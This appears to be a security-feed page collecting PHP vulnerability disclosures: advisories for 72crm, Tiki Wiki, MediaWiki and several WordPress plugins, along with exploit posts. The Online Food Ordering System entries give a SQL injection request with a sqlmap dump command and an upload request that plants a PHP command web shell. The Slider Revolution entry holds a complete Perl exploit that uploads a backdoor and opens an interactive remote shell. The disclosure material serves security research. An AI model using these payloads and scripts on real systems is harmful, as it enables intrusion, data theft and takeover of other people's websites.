72crm v9 was discovered to contain an arbitrary file upload vulnerability via the avatar upload function. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

****Brief of this vulnerability****

72crm v9 has Arbitrary file upload vulnerability Where to upload the avatar

****Test Environment****

*   Windows10
*   PHP 5.6.9+Apache/2.4.39

****Affect version****

72crm v9

****Vulnerable Code****

application\\admin\\controller\\Users.php line 259  
  
After follow-up, it was found that the validate was not set, and the move operation was performed directly, resulting in the ability to upload any file  
  
follow-up move function（set filename）  
line 352:  
  
follow up function  
Generate time-based file names with php as a suffix  
  
then move\_uploaded\_file with this filename （thinkphp\\library\\think\\File.php line 369）  

****Vulnerability display****

First enter the background  
Click as shown,go to the Enterprise management background  
  
Click to change avatar  
  
Capture the packet and modify the content as follows  
  
Although it is judged as an illegal file, the file has been uploaded successfully, and the file path will be exposed when the debug mode is turned on  
  
  
getshell  
  
note：  
Even if debug is not turned on, the file name can be blasted out through the file name naming rules

CVE-2022-46610: 72crm v9 has Arbitrary file upload vulnerability in the avatar upload · Issue #36 · 72wukong/72crm-9.0-PHP

Tiki Wiki CMS Groupware versions 24.0 and below suffer from a PHP code injection vulnerability in structlib.php.

--------------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.0 (structlib.php) PHP Code Injection Vulnerability--------------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.0 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/structures/structlib.php script, specifically in the StructLib::structure_to_webhelp() method, which is using an eval() call with user-controlled input. This can be exploited by malicious users to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires the “feature_create_webhelp” to be enabled and an account with permissions to create a wiki page.[-] Solution:Upgrade to version 24.1 or later.[-] Disclosure Timeline:[08/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22853 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-02

Tiki Wiki CMS Groupware 24.0 structlib.php Code Execution

Tiki Wiki CMS Groupware versions 25.0 and below suffer from multiple cross site request forgery vulnerabilities.

------------------------------------------------------------------------------ 
Tiki Wiki CMS Groupware <= 25.0 Two Cross-Site Request Forgery 
Vulnerabilities 
------------------------------------------------------------------------------

[-] Software Link:

https://tiki.org

[-] Affected Versions:

Version 25.0 and prior versions.

[-] Vulnerabilities Description:

1) The /tiki-importer.php script does not implement any protection 
against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker 
might force an authenticated user to import arbitrary content (wiki 
pages) into TikiWiki by tricking a victim user into browsing to a 
specially crafted web page.

2) The /tiki-import_sheet.php script does not implement any protection 
against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker 
might force an authenticated user to import arbitrary sheets into 
TikiWiki by tricking a victim user into browsing to a specially crafted 
web page. Successful exploitation of this vulnerability requires the 
“Spreadsheets” feature to be enabled.

[-] Solution:

No official solution is currently available.

[-] Disclosure Timeline:

[06/03/2022] - Vendor notified 
[09/01/2023] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) 
has assigned the name CVE-2023-22852 to this vulnerability.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2023-01

Tiki Wiki CMS Groupware 25.0 Cross Site Request Forgery

Online Food Ordering System version 2.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Sql Injection (Time-Based Blind)# Date: 01/10/2023# Exploit Author: Anıl Kızıltan# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPP# username parameter is vulnerable to sql injection. You can exploit this sqlmap command: (First save this raw request as req.txt)# sqlmap -r req.txt -p username --dump-all####### Raw Request #######POST /fos/admin/ajax.php?action=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 32Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/login.phpCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername='-sleep(1)-'&password=a

Online Food Ordering System 2.0 SQL Injection

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated) 
# Date: 01/10/2023 
# Exploit Author: Hakan Sonay 
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html 
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code 
# Version: 2.0 
# Tested on: Windows 10 / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 
Host: localhost 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 
Accept: */* 
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
X-Requested-With: XMLHttpRequest 
Content-Type: multipart/form-data; boundary=---------------------------19276025152284567381240485635 
Content-Length: 831 
Origin: http://localhost 
Connection: close 
Referer: http://localhost/fos/admin/index.php?page=site_settings 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin

-----------------------------19276025152284567381240485635 
Content-Disposition: form-data; name="name"

Online Food Ordering System V2 
-----------------------------19276025152284567381240485635 
Content-Disposition: form-data; name="email"

info@sample.com 
-----------------------------19276025152284567381240485635 
Content-Disposition: form-data; name="contact"

+6948 8542 623 
-----------------------------19276025152284567381240485635 
Content-Disposition: form-data; name="about"

shell command:/assets/img/<file_name>.php?cmd=whoami 
-----------------------------19276025152284567381240485635 
Content-Disposition: form-data; name="img"; filename="rev_shell.php" 
Content-Type: text/php

<?php 
echo system($_GET['cmd']); 
?>

-----------------------------19276025152284567381240485635--

############## Command Execution Request ##############

http://localhost/fos/assets/img/****rev_shell.php?cmd=[Payload]

Online Food Ordering System 2.0 Shell Upload

WordPress Slider Revolution plugin version 4.6.5 suffers from a remote shell upload vulnerability.

==================================================================================================================================== 
| # Title : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit | 
| # Author : indoushka | 
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | 
| # Vendor : https://www.sliderrevolution.com/ | 
| # Dork : index off revslider\backup | 
====================================================================================================================================

[+] poc :

[+] Web shell upload :

 The following perl exploit will attempt to load the HTTP php shell through the update_plugin function 
 To use the exploit, be sure to compress the backdoor file 
 Because the exploit uploads a compressed file to the target

 [+] simple backdoor :

 <?php 
 $cmd = $_GET['cmd']; 
 system($cmd); 
 ?> 

[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl 
# 
# Title :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit 
# Author :indoushka 
# Vendor :https://www.sliderrevolution.com/

use LWP::UserAgent; 
use MIME::Base64; 
use strict;

sub banner { 
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); 
print " ============[+] Author : indoushka[+]===================\n"; 
print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit [+]\n"; 
print " ======================================================== \n"; 
print "[+] Uploading an web shell: [+]\n"; 
print "[+] The following perl exploit will attempt to load the [+]\n"; 
print "[+] HTTP php backdoor through the update_plugin function [+]\n"; 
print "[+] To use the exploit, make sure you compress the backdoor[+]\n"; 
print "============================================================== \n"; 
system('color a'); 
}

if (!defined ($ARGV[0] && $ARGV[1])) { 
banner(); 
print "perl $0 <target> <plugin>\n"; 
print "perl $0 http://localhost revslider\n"; 
exit; 
}

my $zip1 = "indoushka.zip";

unless (-e ($zip1)) 
{ 
banner(); 
print "[-] $zip1 not found! RTFM\n"; 
exit; 
}

my $host = $ARGV[0]; 
my $plugin = $ARGV[1]; 
my $action; 
my $update_file;

if ($plugin eq "revslider") { 
$action = "revslider_ajax_action"; 
$update_file = "$zip1"; 
} 
elsif ($plugin eq "showbiz") { 
$action = "showbiz_ajax_action";

} 
else { 
banner(); 
print "[-] Wrong plugin name\n"; 
print "perl $0 <target> <plugin>\n"; 
print "perl $0 http://localhost revslider\n"; 
exit; 
} 
my $target = "wp-admin/admin-ajax.php"; 
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent { 
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' 
); 
my $random = $array[rand @array]; 
return($random); 
} 
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); 
$ua->timeout(10); 
$ua->agent($useragent); 
my $status = $ua->get("$host/$target"); 
unless ($status->is_success) { 
banner(); 
print "[-] Xploit failed: " . $status->status_line . "\n"; 
exit; 
}

banner(); 
print "[*] Target set to $plugin\n"; 
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) { 
print "[+] Payload successfully executed\n"; 
}

elsif ($exploit->decoded_content =~ /Wrong request/) { 
print "[-] Payload failed: Not vulnerable\n"; 
exit; 
}

elsif ($exploit->decoded_content =~ m/0$/) { 
print "[-] Payload failed: Plugin unavailable\n"; 
exit; 
}

else { 
$exploit->decoded_content =~ /<\/b>(.*?) /; 
print "[-] Payload failed:$1\n"; 
print "[-] " . $exploit->decoded_content unless (defined $1); 
print "\n"; 
exit; 
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] } 
my $rndstr = rndstr(8, 1..9, 'a'..'z'); 
my $cmd1 = encode_base64("echo $rndstr"); 
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system has been disabled/) { 
print "[-] Xploit failed: system() has been disabled\n"; 
exit; 
}

elsif ($status->decoded_content !~ /$rndstr/) { 
print "[-] Xploit failed: " . $status->status_line . "\n"; 
exit; 
}

elsif ($status->decoded_content =~ /$rndstr/) { 
print "[+] Shell successfully uploaded\n"; 
} 
my $cmd2 = encode_base64("whoami"); 
my $whoami = $ua->get("$host/$shell?cmd=$cmd2"); 
my $cmd3 = encode_base64("uname -n"); 
my $uname = $ua->get("$host/$shell?cmd=$cmd3"); 
my $cmd4 = encode_base64("id"); 
my $id = $ua->get("$host/$shell?cmd=$cmd4"); 
my $cmd5 = encode_base64("uname -a"); 
my $unamea = $ua->get("$host/$shell?cmd=$cmd5"); 
print $unamea->decoded_content; 
print $id->decoded_content; 
my $wa = $whoami->decoded_content; 
my $un = $uname->decoded_content; 
chomp($wa); 
chomp($un);

while () { 
print "\n$wa\@$un:~\$ "; 
chomp(my $cmd=<STDIN>); 
if ($cmd eq "exit") 
{ 
print "Aurevoir!\n"; 
exit; 
} 
my $ucmd = encode_base64("$cmd"); 
my $output = $ua->get("$host/$shell?cmd=$ucmd"); 
print $output->decoded_content; 
}

Greetings to :========================================================================================================================= 
 | 
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | 
 | 
=======================================================================================================================================

WordPress Slider Revolution 4.6.5 Shell Upload

An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. SpecialMobileHistory allows remote attackers to cause a denial of service because database queries are slow.

**

\[Unplanned, S\] Mobile frontend's history makes really slow db queries

Closed, ResolvedPublic1 Estimated Story PointsSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Risk Rating

Medium

Author Affiliation

WMF Technology Dept

*   Task Graph
*   Mentions

**Event Timeline**

Ladsgroup added a parent task: Restricted Task.

Jdlrobson renamed this task from Mobile frontend's history makes really slow db queries to (Unplanned, S) Mobile frontend's history makes really slow db queries.Nov 7 2022, 6:45 PM

Jdlrobson renamed this task from (Unplanned, S) Mobile frontend's history makes really slow db queries to \[Unplanned, S\] Mobile frontend's history makes really slow db queries.Nov 7 2022, 6:45 PM

Comment Actions

@Mabualruz will take a look.  
Long term we'd like to get rid of this class/page (T305113), but the change requested here seems very modest so we'd be happy to take a look.  
@Ladsgroup presumably review should happen on this ticket and we shouldn't post anything to Gerrit?

sbassett changed Author Affiliation from N/A to WMF Technology Dept.

sbassett changed Risk Rating from N/A to Medium.

Comment Actions

> @Mabualruz will take a look.  
> Long term we'd like to get rid of this class/page (T305113), but the change requested here seems very modest so we'd be happy to take a look.  
> @Ladsgroup presumably review should happen on this ticket and we shouldn't post anything to Gerrit?

Indeed. It feels like re-inventing the wheel. I don't mind pushing for the removal of the mobile special page. I don't think it'd be much work.

Comment Actions

LGTM in general not a big change, maybe just need to update the constructor's PHPdocs.

Comment Actions

> LGTM in general not a big change, maybe just need to update the constructor's PHPdocs.

I removed the phpdocs because it wasn't giving any extra information and already handled by typehints

Comment Actions

Deployed now. For what it's worth, it had a small issue that I fixed in this:  

sbassett changed the task status from Open to In Progress.EditedNov 15 2022, 4:45 PM

sbassett lowered the priority of this task from Medium to Low.

Comment Actions

Thanks, @Ladsgroup. Since ext:MobileFrontend isn't bundled, I'll track this one for the next supplemental security release at T318974. And within the list of currently-deployed security patches at T276237.

Comment Actions

I believe the security team will handle applying this to master and resolving this ticket. Please feel free to reach out if that's not correct and/or if you need anything from web team by tagging Readers-Web-Backlog .

Comment Actions

> I believe the security team will handle applying this to master and resolving this ticket. Please feel free to reach out if that's not correct and/or if you need anything from web team by tagging Readers-Web-Backlog .

We can, sure. But that likely wouldn't happen until closer to the end of the quarter, when we prep the upcoming supplemental security release (T318974). Since this is patched in wikimedia production, and ext:MF isn't bundled, we can definitely make this task public and folks can start working on any relevant backports if they'd like. But as stated, the Security-Team typically doesn't do that right away, but closer to the actual end-of-quarter supplemental release.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2023-22909: ⚓ T320987 [Unplanned, S] Mobile frontend's history makes really slow db queries

The WP Custom Admin Interface WordPress plugin before 7.29 unserialize user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

CVE-2022-4043

The WPtouch WordPress plugin before 4.3.45 unserialises the content of an imported settings file, which could lead to PHP object injections issues when an user import (intentionally or not) a malicious settings file and a suitable gadget chain is present on the blog.

CVE-2022-3417

The Starter Templates by Kadence WP WordPress plugin before 1.2.17 unserialises the content of an imported file, which could lead to PHP object injection issues when an admin import (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.

Tag

#php